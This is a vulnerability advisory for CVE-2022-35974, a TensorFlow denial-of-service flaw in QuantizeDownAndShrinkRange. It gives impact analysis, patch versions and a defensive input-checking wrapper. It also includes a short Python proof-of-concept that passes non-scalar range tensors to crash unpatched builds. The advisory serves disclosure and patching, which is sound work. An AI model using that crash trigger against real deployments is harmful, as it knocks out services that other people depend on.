CVE-2022-35974: CWE-20: Improper Input Validation in tensorflow/tensorflow

Medium
Published: Fri Sep 16 2022 (09/16/2022, 21:05:12 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

AI-Powered Analysis

Last updated: 06/22/2025, 19:51:34 UTC

Technical Analysis

CVE-2022-35974 is a medium-severity vulnerability in TensorFlow, an open-source machine learning platform widely used across industries for developing and deploying machine learning models. The vulnerability arises from improper input validation (CWE-20) in the QuantizeDownAndShrinkRange operation. When the inputs input_min or input_max are provided as nonscalar tensors instead of the expected scalar values, the operation triggers a segmentation fault (segfault). This segfault can be exploited to cause a denial of service (DoS) condition, crashing the TensorFlow process and disrupting any machine learning workloads relying on it. The issue affects releases prior to 2.7.2, the 2.8.0 release (fixed in 2.8.1), and the 2.9.0 release (fixed in 2.9.1). The vulnerability was patched in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613; the fix first ships in TensorFlow 2.10.0 and has been cherrypicked to the supported 2.7.2, 2.8.1, and 2.9.1 releases. No known exploits have been observed in the wild, and no workarounds exist. The root cause is the lack of validation of input shapes before processing, which leads to memory access violations and crashes. Since TensorFlow is often embedded in larger applications or services, the vulnerability can be triggered remotely if untrusted input reaches the affected operation, potentially causing service interruptions.
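
The crash condition can be illustrated by calling the raw op directly with non-scalar range tensors. The following is a minimal sketch based on the advisory's description, not an official proof of concept; the tensor values are purely illustrative, and it should only be run in a disposable environment against an unpatched build.

```python
import tensorflow as tf

# Illustrative values only. input_min and input_max are documented as
# scalar tensors; on unpatched builds (before 2.7.2, 2.8.1, 2.9.1, or 2.10.0)
# passing rank-1 tensors here crashes the process with a segmentation fault.
quantized = tf.constant([1, 2, 3], dtype=tf.qint32)
bad_min = tf.constant([0.0, 0.0], dtype=tf.float32)   # rank 1, expected rank 0
bad_max = tf.constant([255.0], dtype=tf.float32)      # rank 1, expected rank 0

tf.raw_ops.QuantizeDownAndShrinkRange(
    input=quantized,
    input_min=bad_min,
    input_max=bad_max,
    out_type=tf.quint8,
)
```

On patched versions the same call is rejected with an InvalidArgument-style error instead of terminating the process.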

Potential Impact

For European organizations, the impact of this vulnerability primarily concerns availability. Organizations that rely on TensorFlow for critical machine learning workloads—such as financial institutions using AI for fraud detection, healthcare providers employing AI for diagnostics, or manufacturing firms utilizing AI for predictive maintenance—may experience service disruptions if the vulnerability is exploited. A successful denial of service attack could halt AI-driven processes, leading to operational delays, loss of productivity, and potential financial losses. While the vulnerability does not directly compromise confidentiality or integrity, the disruption of AI services could indirectly affect business continuity and decision-making processes. Given TensorFlow's widespread adoption in research institutions and enterprises across Europe, especially in technology hubs and AI-driven sectors, the risk of operational impact is non-negligible. However, the absence of known exploits in the wild and the requirement for specific malformed inputs to trigger the segfault somewhat limits the immediate threat level. Nonetheless, unpatched systems remain vulnerable to potential targeted DoS attacks.

Mitigation Recommendations

To mitigate this vulnerability, European organizations should prioritize upgrading TensorFlow installations to a patched release: 2.7.2, 2.8.1, 2.9.1, or 2.10.0 and later. Since no workarounds exist, patching is the primary defense. Organizations should audit their machine learning pipelines to identify any components that invoke QuantizeDownAndShrinkRange or related quantization functions, especially those that process external or untrusted inputs. Enforcing strict input validation at the application level before data reaches TensorFlow, for example rejecting non-scalar values for input_min and input_max as sketched below, reduces the risk of malformed inputs reaching the vulnerable code path. Additionally, deploying runtime monitoring and anomaly detection to identify unexpected crashes or segfaults in TensorFlow processes can enable rapid detection and response to potential exploitation attempts. For environments where immediate patching is not feasible, isolating TensorFlow workloads in containerized or sandboxed environments can limit the impact of a DoS condition. Finally, organizations should maintain up-to-date inventories of TensorFlow versions in use and integrate vulnerability scanning into their CI/CD pipelines to detect vulnerable versions promptly.
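
As one possible application-level guard, a wrapper can check tensor ranks before invoking the op. The helper below (quantize_down_checked is a hypothetical name, not a TensorFlow API) is a minimal sketch of that idea, not a substitute for patching.

```python
import tensorflow as tf

def quantize_down_checked(quantized, range_min, range_max, out_type=tf.quint8):
    """Hypothetical guard: reject non-scalar range tensors before the raw op runs."""
    range_min = tf.convert_to_tensor(range_min, dtype=tf.float32)
    range_max = tf.convert_to_tensor(range_max, dtype=tf.float32)
    if range_min.shape.rank != 0 or range_max.shape.rank != 0:
        raise ValueError("input_min and input_max must be scalar tensors")
    return tf.raw_ops.QuantizeDownAndShrinkRange(
        input=quantized,
        input_min=range_min,
        input_max=range_max,
        out_type=out_type,
    )

# Example: malformed ranges are rejected in Python before reaching native code.
# quantize_down_checked(tf.constant([1, 2, 3], dtype=tf.qint32), [0.0, 0.0], 255.0)
# -> ValueError
```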

Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2022-07-15T00:00:00.000Z
CISA Enriched: true

Threat ID: 682d9845c4522896dcbf40b0

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 7:51:34 PM

Last updated: 7/27/2025, 1:08:42 AM
